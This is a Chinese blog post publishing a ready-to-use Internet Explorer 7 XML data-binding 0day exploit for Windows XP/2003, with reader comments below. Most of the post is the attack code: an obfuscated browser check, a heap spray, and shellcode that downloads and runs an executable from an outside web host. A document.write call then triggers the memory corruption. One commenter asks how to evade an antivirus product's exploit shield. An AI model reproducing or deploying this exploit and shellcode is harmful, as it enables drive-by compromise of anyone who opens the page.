Internet Explorer 7.0  XML 0day

漏洞环境:
XP/2003+Internet Explorer 7.0

测试效果: 弹出计算器程序

评述:10月份就有人喊着卖了,据说当时价值12W RMB
<script language="javascript">

if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x69\x65 \x37")==-1)
location.replace("\x61\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B");
</script>
<script>function sleep(milliseconds)
{
    var start = new Date().getTime();
    for (var i = 0; i < 1e7; i++) {
        if ((new Date().getTime() - start) > milliseconds)
        {              break;    
        }
    }
}
function spray(sc) {
var string1 = 0x0a0a0a0a;
var string1temp=unescape;
var shellcodesize = string1temp(sc);
var heapBlockSize = 0x100000; var payLoadSize = shellcodesize.length * 2;
var szlong = heapBlockSize -(payLoadSize+0x038);
var retVal = string1temp("%u0a0a%u0a0a");
retVal = getSampleValue(retVal,szlong);  
aaablk = (string1 - 0x100000)/heapBlockSize;  
zzchuck = new Array();    
for (i=0;i<aaablk;i++)
{      
zzchuck[i] = retVal + shellcodesize;
}
}  

function getSampleValue(retVal, szlong) {  
while(retVal.length*2<szlong)
{        
retVal += retVal; }    
retVal = retVal.substring(0,szlong/2);
return retVal;
}
var a1="%u";
spray("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%u7468%u7074%u2f3a%u662f%u6972%u6464%u2e79%u6e63%u652f%u7078%u632f%u6c61%u2e63%u7865%u0065");
sleep(5000);
nav=navigator.userAgent.toLowerCase();
if (navigator.appVersion.indexOf('MSIE')!=-1)
{   version=parseFloat(navigator.appVersion.split('MSIE')[1])
}
if (version==7)
{  
w2k3 = ((nav.indexOf('windows nt 5.2')!=-1) || (nav.indexOf('windows 2003')!=-1));
wxp = ((nav.indexOf('windows nt 5.1')!=-1) || (nav.indexOf('windows xp')!=-1));  
  if (wxp||w2k3)    document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://rਊr.test.com src=http://www.google.cn]]><![CDATA[>]]

></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');    
  var i=1;  
while ( i <= 10 )  
{window.status=" ";i++; }
}  
</script>

[本日志由 friddy 于 2009-03-02 11:19 AM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
评论: 4 | 引用: 0 | 查看次数: 5389
回复回复c4rp3nt3r[2008-12-29 07:09 PM | del]
请问如何突破瑞星ie防漏墙的检测?

发现缓冲区溢出攻击。
回复回复lk[2008-12-16 11:05 AM | del]
“%%u7468%u7074%u2f3a%u662f%u6972%u6464%u2e79%u6e63%u652f%u7078%u632f%u6c61%u2e63%u7865%u0065”
多了个%。。。。。。
引用来自 friddy friddy 回复
已经修正
回复回复0DAY[2008-12-10 07:21 PM | del]
测试了  XP SP3  +  IE7  
无效啊,是直接保存HTML打开测试吗
回复回复三点半[2008-12-10 02:16 PM | del]
11月份的时候已经有人在出售了...现在终于公布了...
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭